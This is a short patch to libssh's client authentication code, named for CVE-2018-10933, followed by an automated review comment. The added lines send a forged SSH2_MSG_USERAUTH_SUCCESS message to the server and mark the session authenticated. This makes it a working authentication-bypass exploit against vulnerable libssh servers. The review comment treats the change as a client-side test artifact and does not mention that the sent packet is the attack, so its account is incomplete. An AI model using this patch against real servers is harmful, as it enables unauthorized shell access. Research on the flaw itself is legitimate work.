cve-2018-10933.patch
--- src/auth.c 2018-10-19 01:15:21.246145402 +0000
+++ src/auth.c 2018-10-19 01:16:06.802096017 +0000
@@ -145,7 +145,16 @@
if (!ssh_auth_response_termination(session)) {
return SSH_AUTH_AGAIN;
}
-
+ /* we tried to authenticate, so send an authentication success packet to break state machine */
+ ssh_buffer_pack(session->out_buffer, "bsss",SSH2_MSG_USERAUTH_SUCCESS,session->opts.username,"ssh-connection","none");
+ ssh_packet_send(session);
+ /* set the client side session settings & clear errors */
+ session->auth.state = SSH_AUTH_STATE_SUCCESS;
+ session->session_state = SSH_SESSION_STATE_AUTHENTICATED;
+ session->flags |= SSH_SESSION_FLAG_AUTHENTICATED;
+ ssh_reset_error(session);
+ session->auth.current_method = SSH_AUTH_METHOD_UNKNOWN;
+ /* the library will force return SSH_AUTH_STATE_SUCCESS now */
switch(session->auth.state) {
case SSH_AUTH_STATE_ERROR:
rc = SSH_AUTH_ERROR;
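Review bot: The added block beginning at `/* set the client side session settings & clear errors */` marks the session authenticated purely on the client side, and its comments never say that the function's result then stops reflecting any decision by the server. Because `session->auth.state` is overwritten with `SSH_AUTH_STATE_SUCCESS` just before the `switch`, the error branch visible here can presumably never be taken, so a success return from a build carrying this patch is not evidence that a server accepted anything. The results of `ssh_buffer_pack` and `ssh_packet_send` are also discarded, so the same success is reported when nothing was sent. I would open the block with a comment such as `/* CVE-2018-10933 test build only: success below is forced locally and says nothing about the server; never ship or link this as a normal client */`. The enclosing function and the rest of the `switch` lie outside the hunk.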